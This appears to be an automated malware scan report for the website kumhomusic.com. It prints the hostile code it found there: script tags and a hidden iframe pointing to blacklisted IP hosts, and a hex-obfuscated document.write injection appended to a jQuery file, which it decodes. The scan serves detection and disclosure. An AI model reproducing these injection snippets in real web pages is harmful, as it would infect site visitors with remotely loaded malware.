Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kumhomusic.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kumhomusic.com/ | 200 OK Content-Length: 36291 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 60.32.213.44 ...[4220 bytes skipped]... r> </table> </td> </tr> </table> </body> </html> <script type="text/javascript" src="./js/wrest.js"></script> <!-- iframe used instead of a new window --> <iframe width=0 height=0 name='hiddenframe' style='display:none;'></iframe> </body> </html> <script type="text/javascript" src="http://60.32.213.44/mail/holder.js"></script><iframe src=http://121.138.184.231/ttt/sty.htm width=10 height=10></iframe><script type="text/javascript" src="http://121.67.183.105:83/MEDIA/holder.js"></script> Malicious iFrame found. size: 10x10, src: http://121.138.184.231/ttt/sty.htm. This URL is marked by Google as suspicious: <iframe src=http://121.138.184.231/ttt/sty.htm width=10 height=10> |
http://kumhomusic.com/./js/jquery-1.4.2.min.js | 200 OK Content-Length: 72400 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The hex-escaped call appended to the jQuery source decodes to window["document"]["write"]("<script src=//srcme.me/swf.js></script>"), i.e. it injects a remote script from srcme.me into the page. (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.cal window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x2f\x2f\x73\x72\x63\x6d\x65\x2e\x6d\x65\x2f\x73\x77\x66\x2e\x6a\x73\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"); Antivirus reports:
http://kumhomusic.com/./js/common.js | 200 OK Content-Length: 15354 Content-Type: application/javascript | clean |
http://kumhomusic.com/./js/shop.js | 200 OK Content-Length: 500 Content-Type: application/javascript | clean |
http://kumhomusic.com/./swf/flash.js | 200 OK Content-Length: 1465 Content-Type: application/javascript | clean |
http://kumhomusic.com/./js/wrest.js | 200 OK Content-Length: 15539 Content-Type: application/javascript | clean |
http://60.32.213.44/mail/holder.js | 404 Not Found Content-Length: 1621 Content-Type: text/html | clean |
http://60.32.213.44/test404page.js | 404 Not Found Content-Length: 1621 Content-Type: text/html | clean |
http://121.67.183.105:83/MEDIA/holder.js | 404 Not Found Content-Length: 314 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 121.67.183.105 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /MEDIA/holder.js was not found on this server.</p> <hr> <address>Apache Server at <a href="mailto:admin@localhost">121.67.183.105</a> Port 83</address> </body></html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kumhomusic.com
Result:
HTTP/1.1 200 OK
Cache-Control: pre-check=0, post-check=0, max-age=0
Connection: close
Date: Mon, 22 Dec 2014 06:00:45 GMT
Pragma: no-cache
Server: Microsoft-IIS/5.0 PHP/5.2.17
Content-Length: 36291
Content-Type: text/html; charset=utf-8
Expires: 0
Last-Modified: Mon, 22 Dec 2014 06:00:45 GMT
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Set-Cookie: PHPSESSID=17114ab0d453b17a99ea58a5f26ac510; path=/
Set-Cookie: f33d2ed86bd82d4c22123c9da444d8ab=MTQxOTIyODA0NQ%3D%3D; expires=Tue, 22-Dec-2015 06:00:45 GMT; path=/
Set-Cookie: 96b28b766b7e0699aa91c9ff3d890663=deleted; expires=Sun, 22-Dec-2013 06:00:44 GMT; path=/
Set-Cookie: 2a0d2363701f23f8a75028924a3af643=NzguMTU4LjExLjIyNg%3D%3D; expires=Tue, 23-Dec-2014 06:00:45 GMT; path=/
X-Powered-By: PHP/5.2.17
...36291 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kumhomusic.com
Referer: http://www.google.com/search?q=kumhomusic.com
Result:
The result is the same as for the first query. No suspicious redirects were found.